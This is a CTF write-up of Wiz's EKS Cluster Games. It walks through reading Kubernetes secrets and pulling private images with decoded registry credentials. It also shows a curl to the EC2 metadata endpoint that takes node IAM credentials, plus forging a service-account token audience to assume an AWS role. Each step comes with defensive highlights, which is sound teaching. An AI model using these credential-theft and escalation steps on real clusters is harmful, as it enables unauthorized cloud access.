Just had a go at the “EKS Cluster Games,” a captivating CTF challenge by WIZ. This unique Amazon EKS challenge offers a great opportunity to boost your understanding of implementing Kubernetes on AWS. It’s a hands-on experience, simulating real-world scenarios, all aimed at educating and challenging participants. So, let me take you through my journey of cracking it, where the mission was to uncover and understand common security issues in Amazon EKS. Let’s dive into how I tackled it!
By clicking on begin challenge we are presented with a Terminal and the first challenge
Challenge 1: Secret Seeker
viewing the permissions we find out that we have both list and get permissions for the Secret resource.For those acquainted with Kubernetes, the “list” permission fetches existing resources, while “get” permission enables reading the contents of a resource.
From here we can use kubectl get secrets
and
to find the flag.kubectl get secrets log-rotate
As the flag is Base64
encoded we can decode it to get the first flag.
Highlights
- Access to Kubernetes Secrets demands stringent control. These resources house crucial data such as passwords and tokens, making it vital to manage access meticulously for enhanced security.
- The scenario underscores the importance of routinely auditing permission settings in Kubernetes. This practice guarantees that access levels stay fitting and sensitive information is adequately shielded.Having permissions for
list
andget
sensitive resources, like Secrets, is potent. It serves as a reminder to handle these permissions with care to safeguard critical data.
Challenge 2: Registry Hunt
The challenge description indicates to focus on registries
So first we check the permissions
we see that we don’t have list
permission to the secrets So we only secrets if we know their name and we have list
and get
permissions for pods.So we use
kubectl get pods
to identify pods.
We extract the YAML configuration of the database-pod-2c9b3a4e to see if It contains some info.
kind: Pod metadata: annotations: kubernetes.io/psp: eks.privileged pulumi.com/autonamed: "true" creationTimestamp: "2023-11-01T13:32:05Z" name: database-pod-2c9b3a4e namespace: challenge2 resourceVersion: "12166896" uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6 spec: containers: - image: eksclustergames/base_ext_image imagePullPolicy: Always name: my-container resources: {} terminationMessagePath: /dev/termination-log terminationMessagePolicy: File volumeMounts: - mountPath: /var/run/secrets/kubernetes.io/serviceaccount name: kube-api-access-cq4m2 readOnly: true dnsPolicy: ClusterFirst enableServiceLinks: true imagePullSecrets: - name: registry-pull-secrets-780bab1d nodeName: ip-192-168-21-50.us-west-1.compute.internal preemptionPolicy: PreemptLowerPriority priority: 0 restartPolicy: Always schedulerName: default-scheduler securityContext: {} serviceAccount: default serviceAccountName: default terminationGracePeriodSeconds: 30 tolerations: - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 300 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 300 volumes: - name: kube-api-access-cq4m2 projected: defaultMode: 420 sources: - serviceAccountToken: expirationSeconds: 3607 path: token - configMap: items: - key: ca.crt path: ca.crt name: kube-root-ca.crt - downwardAPI: items: - fieldRef: apiVersion: v1 fieldPath: metadata.namespace path: namespace status: conditions: - lastProbeTime: null lastTransitionTime: "2023-11-01T13:32:05Z" status: "True" type: Initialized - lastProbeTime: null lastTransitionTime: "2023-12-07T19:54:26Z" : "True" type: Ready - lastProbeTime: null lastTransitionTime: "2023-12-07T19:54:26Z" status: "True" type: ContainersReady - lastProbeTime: null lastTransitionTime: "2023-11-01T13:32:05Z" status: "True" type: PodScheduled containerStatuses: - containerID: containerd://8010fe76a2bcad0d49b7d810efd7afdecdf00815a9f5197b651b26ddc5de1eb0 image: docker.io/eksclustergames/base_ext_image:latest imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623 lastState: terminated: containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af exitCode: 0 finishedAt: "2023-12-07T19:54:25Z" reason: Completed startedAt: "2023-11-01T13:32:08Z" name: my-container ready: true restartCount: 1 started: true state: running: startedAt: "2023-12-07T19:54:26Z" hostIP: 192.168.21.50 phase: Running podIP: 192.168.12.173 podIPs: - ip: 192.168.12.173 qosClass: BestEffort
In this data we find the name of a secret
name: registry-pull-secrets-780bab1d
so lets take a look at it.
we can see some base64 encoded data so lets decode that
by decoding the data data we got the name & registry credentials.As Docker is not installed we will use the crane utility mentioned in the challenge description.
Now we can try to pull the docker image we identified in the database-pod-2c9b3a4e to our /tmp
directory.
After extracting it looks like the are some more tar files so lets take a look at them starting with the smaller one.
we can see there a file called flag.txt so let check it out
Highlights
- Using Secrets for Docker registry authentication is crucial for keeping containers safe. It makes sure only authorized access happens to private registries, preventing any unauthorized downloading of images. Also, it’s important to stick to private registries in Kubernetes setups. This helps steer clear of potential security issues and gives better control over your software resources.
Additional Info
Challenge 3: Image Inquisition
The first step is to check what permissions are available to us.We can do that by clicking the view permissions button or by using kubectl auth can-i --list
As we can see our permissions are limited to list and get pods.
The next step is to enumerate which pods are running.
There is only 1 pods running so moving further lets check its YAML config
root@wiz-eks-challenge:~# kubectl get pod -o yaml apiVersion: v1 items: - apiVersion: v1 kind: Pod metadata: annotations: kubernetes.io/psp: eks.privileged pulumi.com/autonamed: "true" creationTimestamp: "2023-11-01T13:32:10Z" name: accounting-pod-876647f8 namespace: challenge3 resourceVersion: "12166911" uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2 spec: containers: - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 imagePullPolicy: IfNotPresent name: accounting-container resources: {} terminationMessagePath: /dev/termination-log terminationMessagePolicy: File volumeMounts: - mountPath: /var/run/secrets/kubernetes.io/serviceaccount name: kube-api-access-mmvjj readOnly: true dnsPolicy: ClusterFirst enableServiceLinks: true nodeName: ip-192-168-21-50.us-west-1.compute.internal preemptionPolicy: PreemptLowerPriority priority: 0 restartPolicy: Always schedulerName: default-scheduler securityContext: {} serviceAccount: default serviceAccountName: default terminationGracePeriodSeconds: 30 tolerations: - effect: NoExecute key: node.kubernetes.io/not-ready operator: Exists tolerationSeconds: 300 - effect: NoExecute key: node.kubernetes.io/unreachable operator: Exists tolerationSeconds: 300 volumes: - name: kube-api-access-mmvjj projected: defaultMode: 420 sources: - serviceAccountToken: expirationSeconds: 3607 path: token - configMap: items: - key: ca.crt path: ca.crt name: kube-root-ca.crt - downwardAPI: items: - fieldRef: apiVersion: v1 fieldPath: metadata.namespace path: namespace status: conditions: - lastProbeTime: null lastTransitionTime: "2023-11-01T13:32:10Z" status: "True" type: Initialized - lastProbeTime: null lastTransitionTime: "2023-12-07T19:54:29Z" status: "True" type: Ready - lastProbeTime: null lastTransitionTime: "2023-12-07T19:54:29Z" status: "True" type: ContainersReady - lastProbeTime: null lastTransitionTime: "2023-11-01T13:32:10Z" status: "True" type: PodScheduled containerStatuses: - containerID: containerd://665178aaf28ddd6d73bf88958605be9851e03eed9c1e61f1a1176a69719191f2 image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3 imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 lastState: terminated: containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe exitCode: 0 finishedAt: "2023-12-07T19:54:28Z" reason: Completed startedAt: "2023-11-01T13:32:11Z" name: accounting-container ready: true restartCount: 1 started: true state: running: startedAt: "2023-12-07T19:54:29Z" hostIP: 192.168.21.50 phase: Running podIP: 192.168.5.251 podIPs: - ip: 192.168.5.251 qosClass: BestEffort startTime: "2023-11-01T13:32:10Z" kind: List metadata: resourceVersion: ""
In the YAML config we find the image id which tells us that this pod uses AWS ECR as its container registry
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
Lets check if we have access to metadata
It seem we do have access to metadata so the next logical step is to enumerate further.
This gives us the name of the IAM role associated with the instance and we can use the command
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
to get temporary security credentials.
We are only able curl this instance metadata service as we are running inside a compromised eks pod hence the reminder in the description.From here we use these credentials to set AWS environment variables for temporary security credentials.
We can now leverage the environment variables we just set to get the password required to authenticate.
Now we have all the pieces so lets can use the crane utility to login.
Lets check the contents on the config file.
We find the flag for challenge 3 of the EKS cluster games in the config file.
Highlights
- Uncovering Valuable Insights from EC2 Instance Metadata: In cloud setups, especially within AWS, tapping into EC2 instance metadata provides a wealth of information, including essential AWS credentials. It’s crucial to control and observe access to EC2 instance metadata. Enable IMDSv2 and deploy IAM roles for EC2 instances for dynamic and secure credential management.
- Emphasizing the Significance of Clean Image Layers: Refrain from leaving confidential data, particularly credentials, within image layers or histories. Implement policies for scanning and managing images to identify and eliminate sensitive information. Educate developers on the best practices for creating and maintaining images.
Challenge 4: POD Break
Lets check what permissions we have using
kubectl auth can-i --list
We find ourselves with no permissions.The next step is to check if IMDSv1 is enabled as it opens a pathway to extract EC2 metadata which can have valuable data.
It seems we still have access to the IMDSv1 endpoint and are now able to directly use the node’s IAM role.Upon further inspection we find that the environment variable has held the credentials from the previous challenge.
We now also know that the cluster name seems to be “eks-challenge-cluster” .So instead of poking around AWS,lets first try to use this role to access the Kubernetes API using the node IAM role. To do this we need to create an aws-iam-authenticator token.we can do that by
TOKEN="$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r .status.token)"
Now let’s use this identity to further enumerate. Checking the permissions we see that we have list and get permissions for secret so lets lake a look.
Inside secrets we find our base64 encode flag which can be decoded to get the flag.
Highlights
- Managing Tokens Securely and Permission Considerations: The utilization of aws eks get-token underscores the critical need for meticulous token management. It is imperative to handle tokens, especially those endowed with significant permissions, securely. This practice is essential to thwart any unauthorized access attempts and maintain the integrity of cluster resources.
- IAM’s Integral Role in Kubernetes Security: The convergence of AWS IAM roles and Kubernetes highlights the intricacies involved in access management. Grasping the nuances of IAM role assumptions within Amazon EKS is paramount for establishing robust access controls and mitigating the risks of privilege escalation. Understanding and implementing secure IAM practices contribute significantly to overall Kubernetes security.
Challenge 5 : Containers secret infrastructure
Straightaway we start with check the information provided to us that is
IAM policy
Trust Policy
Permissions
The challenge discription tells us that we need to acquire the AWS role of s3aaccess-sa
service account.Let’s list all service accounts to check if our target account is among them.
As our target is present lets enumerate an bit more and see what it holds.
Looking at the s3access service account we observe that the accounts are annotated with the actual user account we need to become.
arn:aws:iam::688655246681:role/challengeEksS3Role
From the permissions we know that we can create service account tokens as debug-sa
so let’s use the created token in conjunction with the aws sts assume-role-with-web-identity
command to maybe get access.
This gave an error. Analysing the jwt token we find that the audience was set as "aud": [ "https://kubernetes.default.svc"
.we need to bypass the audience check,so we use the create token command again but this time with the audience set to sts.amazonaws.com
which we got from the trust policy.
In order to make sure the audience is set correctly we check the token again
we see that it is set to the correct audiance so we can try tried to assume role with web identity again and voila we got the aws credentials for the s3access-sa end point.
We can now us these creds to set up envoirment variables
With this we are now authenticated as a different user.Using this we can get the flag stored in challenge-flag-bucket-3ff1ae2/flag
Highlights
- The ability to generate tokens for service accounts, exemplified by the debug-sa case, can serve as a significant avenue for elevating privileges within Kubernetes setups. A malicious actor holding such permissions may potentially adopt roles with broader access than originally assigned, resulting in unauthorized activities.
- Significance of Trust Policies in IAM: This obstacle underscores the critical role of Trust Policies in AWS IAM. These policies dictate which entities can take on a role, and any misconfigurations can expose the system to security vulnerabilities, such as unauthorized entry or role assumption.
- Token Audience Verification: The challenge encountered with token audience highlights the necessity for stringent verification mechanisms in identity tokens. It is crucial to ensure that tokens are issued to and utilized by their intended audience to prevent misuse.
- Understanding IAM Role Associations in Kubernetes: This scenario emphasizes the importance of comprehending how IAM roles align with Kubernetes service accounts. Misinterpreting these associations can lead to security oversights, particularly in intricate cloud-native environments